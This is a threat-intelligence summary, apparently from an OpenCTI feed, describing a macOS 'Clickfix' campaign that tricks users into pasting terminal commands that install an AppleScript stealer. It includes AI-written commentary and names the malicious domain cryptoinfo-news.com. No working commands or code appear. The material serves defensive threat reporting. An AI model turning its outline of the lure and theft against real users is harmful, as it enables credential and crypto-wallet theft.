Clickfix on macOS: AppleScript Stealer, Terminal Phishing, and C2 Infrastructure

SUMMARY :

A sophisticated phishing campaign targeting macOS users employs a technique called Clickfix, which tricks victims into running terminal commands that execute malicious AppleScript. This script steals sensitive data including browser profiles, crypto wallets, and personal files. The attackers use fake security prompts and CAPTCHA pages on domains like cryptoinfo-news.com to appear legitimate. The stolen data is exfiltrated to command and control servers, some of which run on unusual ports. The campaign's infrastructure spans multiple regions, with several C2 servers hosted in Russia. The analysis uncovered over 50 related servers with similar configurations, suggesting a financially motivated and globally distributed operation.

OPENCTI LABELS :

phishing,macos,data theft,clickfix,c2 infrastructure,applescript,cryptowallet,terminal commands


AI COMMENTARY :

1. In the ever-evolving landscape of cyber threats, macOS users have become targets of a sophisticated phishing campaign known as Clickfix. This operation tricks victims into executing terminal commands under the pretense of legitimate security prompts and CAPTCHA checks served from domains such as cryptoinfo-news.com. The campaign’s apparent professionalism, coupled with the macOS environment’s perceived resilience, has allowed attackers to fly under the radar while harvesting high-value data.

2. At the heart of the Clickfix campaign lies a clever combination of social engineering and script execution. Users are lured by fake notifications claiming that their systems or browsing sessions are compromised, prompting them to copy and paste terminal commands. Once the commands run, an AppleScript drops onto the machine. This script escalates privileges, bypasses security controls, and runs quietly in the background. The use of terminal phishing not only catches unwary users off guard but also exploits a lesser-known attack surface in the macOS security model.

3. The malicious AppleScript component, aptly dubbed the AppleScript Stealer, is designed to scour the victim’s device for valuable information. It collects browser profiles, session cookies, stored credentials, and even crypto wallet files. By integrating directly with the terminal and leveraging AppleScript’s system automation capabilities, the stealer can access directories that typical malware might struggle to reach. This stealthy approach ensures minimal user suspicion, enabling the campaign to continue undetected for extended periods.

4. Once the data is harvested, it is meticulously packaged and encrypted before being exfiltrated to the attackers’ command and control servers. The range of stolen data poses significant risks, from account takeovers and identity theft to direct financial losses through drained crypto assets. The inclusion of personal files in the exfiltration process further amplifies the campaign’s potential for extortion and blackmail. Victims may not realize the full extent of the breach until sensitive information appears on illicit marketplaces or when unauthorized transactions hit their accounts.

5. The infrastructure supporting Clickfix is global and robust, featuring more than 50 known servers with consistent configurations. Several command and control nodes reside in Russia and operate on nonstandard ports, complicating network detection efforts. The distributed nature of these servers demonstrates the attackers’ financial motivation and their commitment to maintaining uptime and redundancy. Researchers have identified multiple ancillary domains and hosting providers, revealing a well-resourced operation capable of adapting swiftly to takedown attempts.

6. Defending against Clickfix requires a layered approach. Organizations and individual users must enforce strict policies around terminal command execution, ensuring that IT teams verify any unsolicited instructions. Browser and system updates should be applied promptly to close vulnerability gaps, and multi-factor authentication ought to protect high-value accounts and wallets. Endpoint detection solutions that monitor AppleScript execution and unusual network connections can provide early warning. Above all, enhancing user awareness about terminal phishing and the dangers of social engineering remains a critical step in thwarting campaigns like Clickfix.


OPEN NETMANAGEIT OPENCTI REPORT LINK!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


Clickfix on macOS: AppleScript Stealer, Terminal Phishing, and C2 Infrastructure